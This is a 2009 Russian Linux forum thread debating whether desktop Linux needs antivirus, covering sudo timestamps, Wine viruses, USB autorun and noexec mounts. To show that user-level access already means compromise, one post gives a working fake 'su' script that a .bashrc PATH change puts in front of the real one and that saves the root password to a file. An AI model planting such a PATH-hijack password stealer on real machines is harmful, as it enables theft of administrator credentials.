Нужен ли антивирус на десктопе? (Вслед за фаером и антивирус.)

Любые разговоры которые хоть как-то связаны с тематикой форума

Модератор: Модераторы разделов

Антивирус
Нужен ли антивирус на десктопе?

Да
189
28%
Нет
492
72%

Всего голосов: 681

Rootlexx
Бывший модератор
Статус: GNU generation
ОС: Debian GNU/Linux

Re: Нужен ли антивирус на десктопе?

Сообщение Rootlexx »

watashiwa_darede... писал(а):
03.08.2009 21:26
Нет, не сработает. Времена изменились, вручную из консольки команды запускает уже меньшинство. У большинства программы сами спрашивают пароль для подтверждения перехода в привилегированный режим (aptitude, например, всякие гуёвые конфигурялки в убунте и пр.). Всякие su и sudo запускаются по полному пути в этом случае.

Если у злоумышленника есть доступ к учётной записи пользователя, которому разрешено запускать что sudo, что su — в любом случае система скомпрометирована. Я не спорю, что запоминание пароля — уязвимое место в безопасности (хотя это не Ubuntu так настроена — sudo запоминает пароли по умолчанию). Но далеко не самое главное. Кому хочется большей безопасности, тот устанавливает временной промежуток в нуль и прописывает в /etc/sudoers все возможные команды, которые могут запускаться через sudo, и только они. Но, учитывая необходимость получения доступа к учётной записи, это нельзя назвать открытой дырой. Всё же главная дыра в системе — это её пользователь... Можно просто выдать ему ненастоящее окно запроса пароля, можно даже следить за его действиями, и выдать это окно в нужный момент, и пользователь введёт пароль.
Да и вы переоцениваете количество пользователей, которые никогда не использовали консоль. Думаю, что подавляющее большинство для чего-то да использовало, далеко не все настройки можно произвести сейчас из графического интерфейса, скажу даже больше — меньшинство.
Спасибо сказали:
sash-kan
Администратор
Статус: oel ngati kameie
ОС: GNU

Сообщение sash-kan »

Rootlexx писал(а):
03.08.2009 22:15
sudo запоминает пароли по умолчанию
sudo не запоминает паролей. всё гораздо проще.
либо:
touch /var/run/sudo/$USER
либо:
touch /var/run/sudo/$USER/$TTY
вариант зависит от наличия флага tty_tickets в /etc/sudoers (или соответсвтующей опции при компиляции).

на основе этого timestamp-а и работает механизм «пора ли спрашивать пароль?». управляется опцией timestamp_timeout в /etc/sudoers.
начинающему неплохо ещё ознакомиться с опциями -k и -v самой программы sudo.

p.s. от злоумышленных alias-ов и подмены $PATH с подстановкой фиктивных бинарников/скриптов весьма помогает указание полного пути. но об этом уже, вроде, писали.

p.p.s. ах, да. от alias-ов может помочь escape. но только от alias-ов. типа:
\sudo или s\udo или su\do или sud\o.
Писать безграмотно - значит посягать на время людей, к которым мы адресуемся, а потому совершенно недопустимо в правильно организованном обществе. © Щерба Л. В., 1957
при сбоях форума см.блог
Спасибо сказали:
watashiwa_daredeska
Бывший модератор
Статус: Искусственный интеллект (pre-alpha)

Сообщение watashiwa_daredeska »

sash-kan писал(а):
04.08.2009 12:22
либо:
touch /var/run/sudo/$USER
либо:
touch /var/run/sudo/$USER/$TTY
Чтобы это сделать, надо уже обладать правами рута.
Спасибо сказали:
sash-kan
Администратор
Статус: oel ngati kameie
ОС: GNU

Сообщение sash-kan »

watashiwa_darede...
я пояснял принцип действия sudo.
естественно, простому смертному доступ в /var/run/sudo заказан.
Писать безграмотно - значит посягать на время людей, к которым мы адресуемся, а потому совершенно недопустимо в правильно организованном обществе. © Щерба Л. В., 1957
при сбоях форума см.блог
Спасибо сказали:
Davinel
ОС: Ubuntu

Сообщение Davinel »

/dev/random писал(а):
03.08.2009 02:26
Davinel писал(а):
02.08.2009 23:15
А возможно ли это, кстати? Не интересовался, но.. каким образом в линуксе можно спятать процесс?
Можно конечно его назвать как нибудь так, чтоб он не вызывал подозрений, но это немного не то..

Рут - может. Информация о процессах берётся из файловой системы /proc, так что достаточно подмонтировать на её место фальшивку.

Ну, рут это не интересно, если у злоумышленника есть рутовые права то game over.
Спасибо сказали:
Bluetooth
Статус: Блюзовый
ОС: Debian Squeeze amd64

Сообщение Bluetooth »

Davinel писал(а):
05.08.2009 19:38
/dev/random писал(а):
03.08.2009 02:26
Davinel писал(а):
02.08.2009 23:15
А возможно ли это, кстати? Не интересовался, но.. каким образом в линуксе можно спятать процесс?
Можно конечно его назвать как нибудь так, чтоб он не вызывал подозрений, но это немного не то..

Рут - может. Информация о процессах берётся из файловой системы /proc, так что достаточно подмонтировать на её место фальшивку.

Ну, рут это не интересно, если у злоумышленника есть рутовые права то game over.

не, как раз тогда начинается самый интересный гейм :)
Спасибо сказали:
ovodigor
ОС: mandriva

Сообщение ovodigor »

все перечитывать много:)
но как на счет wine-вирусов
я думаю многие пользуются wine, я например пока не могу обойтись
а вирус из под wine может удалить содержимое локальных дисков без проблем
Спасибо сказали:
MMouXe

Сообщение MMouXe »

Нужен, к примеру, бесплатный Dr.Web CureIt (нормально работает в wine) для отлова wine-вирей. Или для защиты винды на вирт. машине. А так - нет.
Спасибо сказали:
Davinel

Сообщение Davinel »

ovodigor писал(а):
07.08.2009 16:38
все перечитывать многоsmile.gif
но как на счет wine-вирусов
я думаю многие пользуются wine, я например пока не могу обойтись
а вирус из под wine может удалить содержимое локальных дисков без проблем

я думаю под вайном вирус не пойдет ))
разве что если его специально для вайна написали..
Спасибо сказали:
ovodigor

Сообщение ovodigor »

Davinel писал(а):
07.08.2009 18:36
я думаю под вайном вирус не пойдет ))
разве что если его специально для вайна написали..

что имеется в виду: что вирус не запустится или что он не сможет разобраться в структуре каталогов, т.е. что будет иметь только доступ к home.
хотя и то и другое не проблема, у меня той же самый тотал имеет доступ ко всем дисков (т.е. может удалять все на что имеет права). С другой стороны если он заражен то он ето может спокойно делать (удалять)
Спасибо сказали:
ovodigor

Сообщение ovodigor »

MMouXe писал(а):
07.08.2009 17:09
Нужен, к примеру, бесплатный Dr.Web CureIt (нормально работает в wine) для отлова wine-вирей. Или для защиты винды на вирт. машине. А так - нет.

и насколько он эффективен против авторанов (модификации появляются очень часто), которые переносят как правило на флешках, а некоторые версии могут и позаражать файлы на флешке, а затем их достаточно запустить и наслаждаться вирусами в linux
Спасибо сказали:
Bluetooth

Сообщение Bluetooth »

ovodigor писал(а):
07.08.2009 19:27
MMouXe писал(а):
07.08.2009 17:09

и насколько он эффективен против авторанов (модификации появляются очень часто), которые переносят как правило на флешках, а некоторые версии могут и позаражать файлы на флешке, а затем их достаточно запустить и наслаждаться вирусами в linux

А зачем их запускать? я предпочитаю их удалять
Спасибо сказали:
.Serj.
ОС: Gentoo, Win7

Сообщение .Serj. »

Rootlexx писал(а):
03.08.2009 18:41
watashiwa_darede...
Да, есть такое. Согласен, что это нехорошо, хотя настраивается, разумеется.
Тем не менее, это не отменяет факта, что сначала необходимо получить доступ к выполнению команд. А это уже позволяет скомпрометировать систему безо всяких sudo:

Код: Выделить всё

alexey@desktop:~$ cat > /tmp/.hidden/su
#!/bin/bash

SUCCEED_FILE=/tmp/.succeed;
if [ -f "$SUCCEED_FILE" ]; then
    /bin/su "$@"; else
    printf "Password: ";
    stty -echo;
    read pass;
    stty echo;
    printf "\n";
    sleep 3s;
    printf "su: autentification failure\n";
    printf "root password: \"%s\"\n" "$pass" > /tmp/.root_pass;
    touch "$SUCCEED_FILE";
fi
alexey@desktop:~$ chmod a+x /tmp/.hidden/su
alexey@desktop:~$ printf "export PATH=\"/tmp/.hidden:\$PATH\"\n" >> .bashrc
alexey@desktop:~$

Новая оболочка:

alexey@desktop:~$ su -c whoami
Password:
su: autentification failure
alexey@desktop:~$ # Ой, кажется, не ту педаль нажал. Ну-ка ещё раз...
alexey@desktop:~$ su -c whoami
Password:
root
alexey@desktop:~$ # Всё отлично.

А ночью :ph34r: :

alexey@desktop:~$ cat /tmp/.root_pass
root password: "Here is the password"
alexey@desktop:~$

Да, способ банальнейший, но в большинстве случаев сработает. Разумеется, можно придумать и что-нибудь более скрытное.

Проверил. Не пашет.
Спасибо сказали:
ovodigor

Сообщение ovodigor »

Bluetooth писал(а):
08.08.2009 20:41

а откуда ты знаешь что ты запустил не вирус или зараженой файл?(т.е. когда ты запускает свои файлы на флешке)
Спасибо сказали:
/dev/random
Администратор
ОС: Gentoo

Сообщение /dev/random »

ovodigor писал(а):
09.08.2009 14:02
а откуда ты знаешь что ты запустил не вирус или зараженой файл?(т.е. когда ты запускает свои файлы на флешке)

Бросайте эту вендузятническую привычку держать на флэшке программы.
Спасибо сказали:
Rootlexx
Бывший модератор

Сообщение Rootlexx »

.Serj.
Писал на скорую руку. Возможно, что-то не так сделал. Сейчас проверю...

Добавлено (15:14): создал нового пользователя «test-user». Проделал все приведённые действия методом копирования-вставки. Всё прекрасно работает.
Да и с чего не будет? Создаётся скрипт/программа с названием, совпадающим с оным у какой-то администраторской, сохраняется куда-нибудь подальше от любопытных глаз, добавляется каталог в PATH, и при новом запуске оболочки перечитывается ~/.bashrc , назначается новый PATH, отчего вместо /bin/su будет выполнен наш скрипт. Конечно, в самом скрипте было бы неплохо предусмотреть автоматический возврат всего в исходное состояние, чтобы было не так легко обнаружить вмешательство, но и так работает.
Спасибо сказали:
Bluetooth

Сообщение Bluetooth »

ovodigor писал(а):
09.08.2009 14:02
Bluetooth писал(а):
08.08.2009 20:41

Если я буду допускать, что такое возможно на практике, то всегда смогу проверять свои программы на флэшке путем сверки чексумм, или просто шифровать их буду(и то и то вообще не требуют включенного моска). Это если у меня вообще будут программы на флэшке.
Спасибо сказали:
ovodigor

Сообщение ovodigor »

Bluetooth писал(а):
09.08.2009 15:09
Если я буду допускать, что такое возможно на практике, то всегда смогу проверять свои программы на флэшке путем сверки чексумм, или просто шифровать их буду(и то и то вообще не требуют включенного моска). Это если у меня вообще будут программы на флэшке.

ну тогда проще держать их архивированными и запароленимы. Но суть в том сколько людей такое будет делать?
Большинство делает так как проще, а это не значит безопаснее.
Вирусы могут взламивать систему не напрямую используя ошибки, а просто использовать психологию обычного пользователя.
Помимо того что в связи с переходом некоторого количества школ на linux, после изучения программирования что большинство будет пробовать писать -правильно вирусы и не только. Некоторые просто интересные программы, далее обмениваться между собой. инсталлировать их конечно не надо (то есть куда скопировал оттуда запустил), и соответственно они не будут защищены от перезаписи (изменения).
В той же самой Mandriva автозапуск идет не от рута (не знаю как в других).
А что можно сделать с правами обычного пользователя? Многое (шрифты, комбинации клавиш, настройки экрана ...)
Конечно профессиональные пользователи, так делать не будут, но суть в том что вирусы будут - это лишь вопрос времени, чтобы выросло количество пользователей linux
Спасибо сказали:
drag0n
Статус: Дракон-линуксоид
ОС: Slackware Linux

Сообщение drag0n »

А что мешает в случае массового распространения вирусов (хотя такое вирусом назвать трудно, попадаться будут в основном те, кто не бекапит $HOME, да и то в случае если вирус стремится стереть содержимое жесткого диска, остальное вряд ли) таким образом всем ведущим дистростроителям обеспечить монтирование съемных носителей с noexec? И все, все сосут лапу, тем более причин не монтировать съемные носители с этим флагом нет.
Вирусы могут взламивать систему не напрямую используя ошибки, а просто использовать психологию обычного пользователя.

"Здравствуйте, я таджикский вирус. По причине ужасной бедности моего создателя и низкого уровня развития технологий в нашей стране, я не способен причинить какой-либо вред вашему компьютеру. Поэтому очень прошу: сами сотрите какой-нибудь важный для вас фаил, а потом разошлите меня по почте другим адресатам. ) Заранее благодарю за понимание и сотрудничество."
После каталога /etc понимаешь, что реестр - место, откуда нормальными не возвращаются.
Спасибо сказали:
ovodigor

Сообщение ovodigor »

drag0n писал(а):
09.08.2009 17:13
А что мешает в случае массового распространения вирусов (хотя такое вирусом назвать трудно, попадаться будут в основном те, кто не бекапит $HOME, да и то в случае если вирус стремится стереть содержимое жесткого диска, остальное вряд ли) таким образом всем ведущим дистростроителям обеспечить монтирование съемных носителей с noexec? И все, все сосут лапу, тем более причин не монтировать съемные носители с этим флагом нет.

noexec это без права запуска?
И что это даст ? От заражения вирусами исполняемых файлов это не спасет.

drag0n писал(а):
09.08.2009 17:13
"Здравствуйте, я таджикский вирус По причине ужасное бедносты моего создателям и рядом уровня развития технологий в нашей стране, я не способен причине какой-либо вреда вашему компьютера. Поэтому очень прошу: сами сотрите какой-нибудь важный для вас фаил, а потом разошлите меня по почте второй адресатам.) Заранее благодарю за понимание и сотрудничество. "

слышал о таком вирусе:)

P.S. Предположим что вирус каким образом запустился с правами пользователя, что он может сделать? При этом возникают такие вопросы:
1. сколько пользователей имеют прикручен к руту sudo (с недавних пор перестал это делать)
2. сколько пользователей используют скрипты, которые используют часто для рутовый операций (например, я для монтирования iso-файлов) и где они размещены, и с какими правами (у меня без рута можно поменять их:))
3 где находятся, например, rpm-ки или tar-ки, в которых тоже немного можно поменять? (время от времени я скачиваю на официальных сайтах некоторые программы которых нет в дистрибутиве,
а сколько пользователей используют не только скачаных с официальных сайтов программы, или носят на флешках, чтобы например, поставить там где нет интернета, не записывать же 30 метров на dvd-r/rw :))
4 как думаете сложно скопировать изображение окна где нужно ввести пароль для подтверждения операции с правами рута, пройтись по окне и найти размещение компонентов на нем, чтобы создать аналогичное поверх настоящего, и считать пароль рута?
Спасибо сказали:
Bluetooth

Сообщение Bluetooth »

ovodigor писал(а):
09.08.2009 17:01
Bluetooth писал(а):
09.08.2009 15:09

ну тогда проще держать их архивированными и запароленимы.

Нет, не проще. Тем более я привык вещи по своему назначению использовать. А использовать винрар(ведь наверняка под арзивированным и запароленным вы имели ввиду хранение в рар? :) ) для этих целей - попахивает маразмом.
Но суть в том сколько людей такое будет делать?
Большинство делает так как проще, а это не значит безопаснее.

Конечно же, немногие. Вообще практически никто, ибо вообще мало кто будет совать на флешку какие-то там программы.
Конечно, самый простой способ взломать любую систему - заставить пользователя самостоятельно запустить вредоносную программу. Это всем понятно. Но что вы хотите этим сказать?
Конечно профессиональные пользователи, так делать не будут, но суть в том что вирусы будут - это лишь вопрос времени, чтобы выросло количество пользователей linux

Вас это беспокоит? Меня - нет. Я знаю, как в случае нужды довольно надежно от всего этого защититься. Ибо система позволяет.
Спасибо сказали:
drag0n
Статус: Дракон-линуксоид
ОС: Slackware Linux

Сообщение drag0n »

noexec это без права запуска?
И что это даст ? От заражения вирусами исполняемых файлов это не спасет.

Зато вирус с флешки никаким автораном не запустится. Придется его инсталлировать в указанную в README папку. А потом еще и качать сорцы и патчить, чтобы заработало...:-)
После каталога /etc понимаешь, что реестр - место, откуда нормальными не возвращаются.
Спасибо сказали:
Davinel

Сообщение Davinel »

ovodigor писал(а):
07.08.2009 19:19
что имеется в виду: что вирус не запустится или что он не сможет разобраться в структуре каталогов, т.е. что будет иметь только доступ к home.
хотя и то и другое не проблема, у меня той же самый тотал имеет доступ ко всем дисков (т.е. может удалять все на что имеет права). С другой стороны если он заражен то он ето может спокойно делать (удалять)

Что значит "запустится"? Вы подразумеваете, что я сам, ручками, возьму и запущу его? Не кажется, что это немного чересчур? )) Если же говорить о нормальных вирусах, которые попадают на компьютер через различные уязвимости в сервисах и запускают сами себя через них же - то увольте, вайн не эмулирует виндовые сервисы, и уж точно не эмулирует виндовые дыры в безопасности. Наверняка в вайне есть свои - но это нужно именно под них и писать вирус. Какой то страшный изврат - вирус персонально для вайна ))

ovodigor писал(а):
09.08.2009 17:01
автозапуск идет не от рута

Автозапуск в лине и в винде - разные вещи. В линуксе единственное, что он делает - открывает папку с флэшкой. Никаких секретных запусков программ, никаких скрытных подмен файлов тут просто не предусмотрено. Да, вот такая вот убогая система....

Вообще на данный момент в большинстве дистрибутивов безопасностью не озабочены ни на грош. В какой то мере оно верно - безопасность создает неудобства, а угрозы пока нет. Но это ведь не значит, что ей нельзя будет озаботиться в будущем и тогда от подавляющего большинства проникновений можно будет защититься банальным выставлением прав, запрета на запуск/изменение файлов и т.д.

Rootlexx писал(а):
09.08.2009 15:05
Добавлено (15:14): создал нового пользователя «test-user». Проделал все приведённые действия методом копирования-вставки. Всё прекрасно работает.
Да и с чего не будет? Создаётся скрипт/программа с названием, совпадающим с оным у какой-то администраторской, сохраняется куда-нибудь подальше от любопытных глаз, добавляется каталог в PATH, и при новом запуске оболочки перечитывается ~/.bashrc , назначается новый PATH, отчего вместо /bin/su будет выполнен наш скрипт. Конечно, в самом скрипте было бы неплохо предусмотреть автоматический возврат всего в исходное состояние, чтобы было не так легко обнаружить вмешательство, но и так работает.

Ну от этого довольно легко можно уйти, просто запретив изменять PATH юзеру. Что, имхо, будет правильно с точки зрения секьюрности (:
Спасибо сказали:
Rootlexx
Бывший модератор

Сообщение Rootlexx »

Davinel писал(а):
09.08.2009 20:10
Ну от этого довольно легко можно уйти, просто запретив изменять PATH юзеру. Что, имхо, будет правильно с точки зрения секьюрности (:

Вы имеете в виду добавление в /etc/bashrc чего-то типа такого:

if [ $EUID -ne 0 ]; then
        declare -r PATH;
fi
?
Да, но в каком дистрибутиве так сделано по умолчанию? А если это нужно настраивать, так и sudo можно настроить на нулевой период запоминания авторизации. Мы ведь рассматривали поведение по умолчанию.
Спасибо сказали:
ovodigor

Сообщение ovodigor »

drag0n писал(а):
09.08.2009 19:56
Зато вирус с флешки никаким автораном не запустится. Придется его инсталлировать в указанную в README папку. А потом еще и качать сорцы и патчить, чтобы заработало...:-)

зато переносится вирус нормально посредством копирование зараженных файлов методом ctrl + c, ctrl + v
Спасибо сказали:
ovodigor

Сообщение ovodigor »

Bluetooth писал(а):
09.08.2009 19:54
Нет, не проще. Тем более я привык вещи по своему назначению использовать. А использовать винрар(ведь наверняка под арзивированным и запароленным вы имели ввиду хранение в рар? :) ) для этих целей - попахивает маразмом.

возможно, но у каждого разные методы

Bluetooth писал(а):
Конечно же, немногие. Вообще практически никто, ибо вообще мало кто будет совать на флешку какие-то там программы.
Конечно, самый простой способ взломать любую систему - заставить пользователя самостоятельно запустить вредоносную программу. Это всем понятно. Но что вы хотите этим сказать?

я держу на флешке программы и что? Суть не в том, что вирусы не попадут на компьютер, суть в том что будет с системой если пользователь его запустит (или зараженный файл) не обязательно через вайн. Т.е. нужен ли антивирус, а не в том, что конкретно вы сможете от них защититься. Теоретически и в винде просто защититься от вирусов

Bluetooth писал(а):
Вас это беспокоит? Меня - нет. Я знаю, как в случае нужды довольно надежно от всего этого защититься. Ибо система позволяет.

еще раз повторю, то что я мог в винде обходиться без антивируса, только иногда бросать на проверку и сразу же удалять антивирус, вовсе не означало что ко мне не приходили раз в неделю переставить винду или посмотреть чего комп глючит
Спасибо сказали:
ovodigor

Сообщение ovodigor »

Davinel писал(а):
Что значит "запустится"? Вы подразумеваете, что я сам, ручками, возьму и запущу его? Не кажется, что это немного чересчур? )) Если же говорить о нормальных вирусах, которые попадают на компьютер через различные уязвимости в сервисах и запускают сами себя через них же - то увольте, вайн не эмулирует виндовые сервисы, и уж точно не эмулирует виндовые дыры в безопасности. Наверняка в вайне есть свои - но это нужно именно под них и писать вирус. Какой то страшный изврат - вирус персонально для вайна ))

например, у меня стоит параллельно винда потому что некоторые не знают что может быть другое:). И там порой появляются вирусы:) так вот программы которые я запускаю под вайна могут быть заражены, то есть запускаю я их сам:)

А на счет того кудою вирусы быстрее добираются то это следует поспрашивать в общежитиях, то есть путем обмена (а антивирус главное имеет каждый)
Davinel писал(а):
Автозапуск в лине и в винде - разные вещи. В линуксе единственное, что он делает - открывает папку с флэшкой. Никаких секретных запусков программ, никаких скрытных подмен файлов тут просто не предусмотрено. Да, вот такая вот убогая система....

я имел в виду автозапуск программ при старте системы

Davinel писал(а):
Вообще на данный момент в большинстве дистрибутивов безопасностью не озабочены ни на грош. В какой то мере оно верно - безопасность создает неудобства, а угрозы пока нет. Но это ведь не значит, что ей нельзя будет озаботиться в будущем и тогда от подавляющего большинства проникновений можно будет защититься банальным выставлением прав, запрета на запуск/изменение файлов и т.д.

я отвечу после того как определимся с тем или вирусы действуют полностью самостоятельно используя ошибки системы или иногда по запускаются по вине пользователя? :)
Спасибо сказали:
Davinel

Сообщение Davinel »

ovodigor писал(а):
09.08.2009 23:01
например, у меня стоит параллельно винда потому что некоторые не знают что может быть другое :) . И там порой появляются вирусы :) так вот программы которые я запускаю под вайна могут быть заражены, то есть запускаю я их сам :)

Уверен на 99.9% что ничего не будет. Вирусы слишком сложны, расчитаны на то, чтобы скрывать себя, маскироваться под другие процессы и т.д. и используют они для этого виндовые методы. В линухе ОС с памятью совершенно иначе работает.
ovodigor писал(а):
я имел в виду автозапуск программ при старте системы

Секретных способов автозапуска, типа виндового реестра, тут тоже нету. А хуже всего то, что способов автозапуска тут очень много, но каждый конкретный способ работает только в одном определенном случае. Я вот например использую авесам и автостартую программы через .xsession. Гном - через .config/autostart, кеды - еще через что то там. Если использовать все способы сразу - как то слишком заметно получается.
ovodigor писал(а):
я отвечу после того как определимся с тем или вирусы действуют полностью самостоятельно используя ошибки системы или иногда по запускаются по вине пользователя? :)

Для дурака подойдет и выскочившая табличка "выполняется rm -rf / введите пароль рута". Тут никакие антивирусы не помогут.
Спасибо сказали:
Bluetooth

Сообщение Bluetooth »

Davinel писал(а):

А вот и неправда. Еще как озабочены. Только они еще и озабочены удобством пользователя, поэтому Вы ни в одном дистрибутиве не найдете параноидальных настроек безопасности, ибо это просто неудобно большинству.А параноики это все себе сами настроят.

...и неудобно с точки зрения юзера)))
зато переносится вирус нормально посредством копирование зараженных файлов методом ctrl + c, ctrl + v
У меня таких хоткеев нет. Вирусы мне не страшны?))))
например, у меня стоит параллельно винда потому что некоторые не знают что может быть другоеsmile.gif. И там порой появляются вирусыsmile.gif так вот программы которые я запускаю под вайна могут быть заражены, то есть запускаю я их самsmile.gif
Как грится, ССЗБ :))

Секретных способов автозапуска, типа виндового реестра, тут тоже нету. А хуже всего то, что способов автозапуска тут очень много, но каждый конкретный способ работает только в одном определенном случае. Я вот например использую авесам и автостартую программы через .xsession. Гном - через .config/autostart, кеды - еще через что то там. Если использовать все способы сразу - как то слишком заметно получается.
А какой ламер станет прописывать старт вируса в авторан гнома? Вы видели вирусы под винду, которы бы в стартовом меню в папке автозапуск лежали? :))
Нормальные люди внедрят его куда угодно, но уж явно не во всякую хрень из пользовательского окружения.
Спасибо сказали:
ovodigor

Сообщение ovodigor »

Davinel писал(а):
10.08.2009 01:12
Уверен на 99.9% что ничего не будет. Вирусы слишком сложны, расчитаны на то, чтобы скрывать себя, маскироваться под другие процессы и т.д. и используют они для этого виндовые методы. В линухе ОС с памятью совершенно иначе работает.

не обязательно, может сначала позаражать все exe-файлы скажем 5 мин пока пользователь не заметил (и антивирус), а потом пробовать маскироваться, а это уже может засечь антивирус, который вируса не увидел (такими могут быть рассуждения вируса в винде, и первая часть действий пройдет в linux)

То есть защита линукса держится на том, что вирусы со стороны вайн просто пока что ничего не смогут сделать?

Davinel писал(а):
10.08.2009 01:12
Для дурака подойдет и выскочившая табличка "выполняется rm -rf / введите пароль рута". Тут никакие антивирусы не помогут.

Таким образом пройдет только раз, я же имею в виду те методы вирусов, против которых нужно защищаться как начальному пользователю так и более профессиональному (я не говорю о 2-3% пользователей, которые смогут защитить систему на 99% не очень простыми методами)
Спасибо сказали: